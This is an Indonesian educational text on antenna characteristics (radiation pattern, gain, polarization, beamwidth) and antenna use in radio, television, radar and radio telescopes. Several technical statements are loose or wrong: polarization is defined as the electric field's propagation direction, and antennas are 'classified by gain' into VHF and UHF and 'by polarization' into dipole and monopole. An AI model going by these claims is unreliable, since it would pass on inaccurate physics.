Ada beberapa karakter penting antena yang perlu dipertimbangkan dalam memilih jenis antena untuk suatu aplikasi (termasuk untuk digunakan pada sebuah teleskop radio), yaitu pola radiasi, directivity, gain, dan polarisasi. Karakter-karakter ini umumnya sama pada sebuah antena, baik ketika antena tersebut menjadi peradiasi atau menjadi penerima, untuk suatu frekuensi, polarisasi, dan bidang irisan tertentu. Misalnya, David Welkinson (0806322514) ingin membeli antena maka untuk mendapatkan antena yang sesuai dengan fungsi yang dinginkan, ia harus memimilih antena dengan karakter yang sesuai dengan fungsi yang dia inginkan.
[Pola radiasi
Pola radiasi antena adalah plot 3-dimensi distribusi sinyal yang dipancarkan oleh sebuah antena, atau plot 3-dimensi tingkat penerimaan sinyal yang diterima oleh sebuah antena. Pola radiasiantena dibentuk oleh dua buah pola radiasi berdasar bidang irisan, yaitu pola radiasi pada bidang irisan arah elevasi (pola elevasi) dan pola radiasi pada bidang irisan arah azimuth (pola azimuth).
Kedua pola di atas akan membentuk pola 3-dimensi. Pola radiasi 3-dimensi inilah yang umum disebut sebagai pola radiasi antena dipol. Sebuah antena yang meradiasikan sinyalnya sama besar ke segala arah disebut sebagai antena isotropis. Antena seperti ini akan memiliki pola radiasi berbentuk bola Namun, jika sebuah antena memiliki arah tertentu, di mana pada arah tersebut distribusi sinyalnya lebih besar dibandingkan pada arah lain, maka antena ini akan memiliki directivity Semakin spesifik arah distribusi sinyal oleh sebuah antena, maka directivity antena tersebut.
Antena dipol termasuk non-directive antenna. Dengan karakter seperti ini, antena dipol banyak dimanfaatkan untuk sistem komunikasi dengan wilayah cakupan yang luas. Pada astronomi radio, antena dipol digunakan pada teleskop radio untuk melakukan pengamatan pada rentang High Frekuensi (HF). Bentuk data yang dapat diperoleh adalah variabilitas intensitas sinyal yang dipancarkan oleh sebuah objek astronomi. Namun, karena antena dipol tidak memiliki directivity pada arah tertentu, teleskop radio elemen tunggal yang menggunakan antena jenis ini tidak dapat digunakan untuk melakukan pencitraan.
Gain
Gain (directive gain) adalah karakter antena yang terkait dengan kemampuan antena mengarahkan radiasi sinyalnya, atau penerimaan sinyal dari arah tertentu. Gain bukanlah kuantitas yang dapat diukur dalam satuan fisis pada umumnya seperti watt, ohm, atau lainnya, melainkan suatu bentuk perbandingan. Oleh karena itu, satuan yang digunakan untuk gain adalah desibel.
Polarisasi
Polarisasi didefinisikan sebagai arah rambat dari medan listrik. Antena dipol memiliki polarisasi linear vertikal . Mengenali polarisasi antena amat berguna dalam sistem komunikasi, khususnya untuk mendapatkan efisiensi maksimum pada transmisi sinyal. Pada astronomi radio, tujuan mengenali polarisasi sinyal yang dipancarkan oleh sebuah objek astronomi adalah untuk mempelajari medan magnetik dari objek tersebut.
Ada beberapa hal yang perlu diperhatikan dalam pola radiasi, yang pertama adalah Half-power Beamwidth (HPBW), atau yang biasa dikenal sebagai beanwidth suatu antena. Dalam astronomi radio, beamwidth adalah resolusi spasial dari sebuah teleskop radio, yaitu diameter sudut minimun dari dua buah titik yang mampu dipisahkan oleh teleskop radio tersebut. Secara teori, beamwidth untuk antena yang berbentuk parabola dapat ditentukan.
Penggunaan antena
[Penggunaan antena pada radio
Antena adalah salah satu elemen penting yang harus ada pada sebuah teleskop radio. Fungsinya adalah untuk mengubah sinyal listrik menjadi sinyal elektromagnetik, lalu meradiasikannya. Dan sebaliknya, antena juga dapat berfungsi untuk menerima sinyal elektromagnetik dan mengubahnya menjadi sinyal listrik. Sehinnya sinyal radio yang dipancarkan oleh stasiun radio dapat ditangkap oleh radio.
Penggunaan antena pada televisi
Berdasarkan peraturan internasional yang berkaitan dengan pengaturan penggunaan frekwensi (Radio Regulation) untuk penyiaran televisi pada pita frekwensi VHF dan UHF. Sejarah pertelevisian di Indonesia diawali pada tahun 1962 oleh TVRI di Jakarta dengan menggunakan pemancar televisi VHF. Pembangunan pemancar TVRI berjalan dengan cepat terutama setelah diluncurkannya satelite palapa pada tahun 1975. Pada tahun 1987, yaitu lahirnya stasiun penyiaran televisi swasta pertama di Indonesia, stasiun pemancar TVRI telah mencapai jumlah kurang lebih 200 stasiun pemancar yang keseluruhannya menggunakan frekwensi VHF, dan pemancar TV swasta pertama tersebut diberikan alokasi frekuensi pada pita UHF. Kebijaksanaan penggunaan pita frekwensi VHF untuk TVRI dan UHF untuk swasta. Sehingga untuk menagkap siran TV digunakan antena VHF dan UHF.
Penggunaan antena pada radar
Radar atau Radio Detection and Ranging adalah suatu alat yang sistemnya memancarkan gelombang elektromagnetik berupa gelombang radio dan gelombang mikro. Pantulan dari gelombang yang dipancarkan tadi digunakan untuk mendeteksi obyek. Radar menggunakan spektrum gelombang elektromagnetik pada rentang frekuensi 300 MHz hingga 30 GHz atau panjang gelombang 1 cm hingga 1 meter. Komponen sistem radar :
1. Transmiter untuk membangkitkan sinyal radio dari osilator.
2. Waveguide adalah penghubung antara Transmiter dan Antena.
3. Receiver adalah penerima pantulan sinyal radio
4. Signal processor adalah peralatan yang mengubah sinyal analog ke sinyal digital.
5. Radar Controller adalah penghubung yang akan mengantarkan informasi ke user
Jenis
Berdasarkan fungsi
Berdasarkan fungsinya antena dibedakan menjadi antena pemancar, antena penerima, dan antena pemancar sekaligus penerima. Di Indonesia antena pemancar banyak dimanfaatkan pada staisun-satsiun radio dan televisi. Selanjutnaya antena penerima, antena penerima ini bisanya digunakan pada alat-alat seperti radio, tv, dan alat komunikasi lainnya.
Berdasarkan gainnya
Berdasarkan besarnya Gainnya antena dibedakan menjadi antena VHF dan UHF yang biasanya digunakan pa TV. Kiranya semua orang tahu bahwa besarnya daya pancar, akan mempengaruhi besarnya signal penerimaan siaran televisi disuatu tempat tertentu pada jarak tertentu dari stasiun pemancar televisi. Semakin tinggi daya pancar semakin besar level kuat medan penerimaan siaran televisi. Namun demikina besarnya penerimaan siaran televisi tidak hanya dipengaruhi oleh besarnya daya pancar. Untuk memperbesar daya pancar pada stasiun Tv dan daya terima pada Tv maka perlu digunakan antena.
Besarnya Gain antena dipengaruhi oleh jumlah dan susunan antena serta frekuensi yang digunakan. Antena pemancarUHF tidak mungkin digunakan untuk pemancar TV VHF dan sebaliknya, karena akan menimbulkan VSWR yang tinggi. Sedangkan antena penerima VHF dapat saja untuk menerima signal UHF dan sebaliknya, namun Gain antenanya akan sangat mengecil dari yang seharusnya. Kualitas hasil pencaran dari pemancar VHF dibandingkan dengan kualitas hasil pancaran dari pemancar UHF adalah sama asalkan keduanya memenuhi persyaratan dan spesifikasi yang telah ditentukan.
Berdasarkan polarisasinya
Berdasarkan polarisasinya antena dibedakan menjadi dua yaitu antena dipol dan monopol. Antena dipol memiliki polarisasi linear vertikal, sedangkan antena monopol polarisasinya hanya pada satu arah. Dengan karakter seperti ini, antena dipol banyak dimanfaatkan untuk sistem komunikasi dengan wilayah cakupan yang luas. Antena Directional dan antena Omnidirectional Antenna Directional adalah antenna yang pola radiasi pancarannya terarah sehingga efektifitas pancaran radio hanya ke satu arah saja,sedangkan antenna Omnidirectional dapat memancarkan gelombang ke segala arah.Yang termasuk Antenna Directional adalah antena model Yagi seperti kebanyakan yang dipakai sebagai antena penerima siaran TV.Contoh antena omnidirectional adalah antena model groundplane.
Berdasarkan bentuknya
Antena berdasarkan bentuknya antara lain: mikrostrip, parabola, vee, horn, helix, dan loop. Walaupun amat sering dijumpai teleskop radio yang menggunakan antena berbentuk parabola, ada beberapa jenis antena lainnya yang juga sering digunakan pada sebuah teleskop radio atau interferometer. Misalnya, Mauritius Radio Telescope(MRT) yang menggunakan 1084 buah antena berbentuk helix . Contoh lainnya adalah teleskop radio yang menggunakan antena berbentuk horn, yang digunakan oleh Arno Penzias dan Robert Woodrow Wilson ketika menemukan Cosmic Microwave Background(CMB). Contoh antena berdasarkan bentuknya adalah antena parabola, Antena parabola merupakan antena yang berbentuk parabola, pancaran sinyal akan dikonsentrasikan pada titik tengah antenna. Antenna parabola biasanya didesain untuk Frekuensi Ultra Tinggi UHF, penerima siaran TV Satelit, dan transmisi gelombang mikro.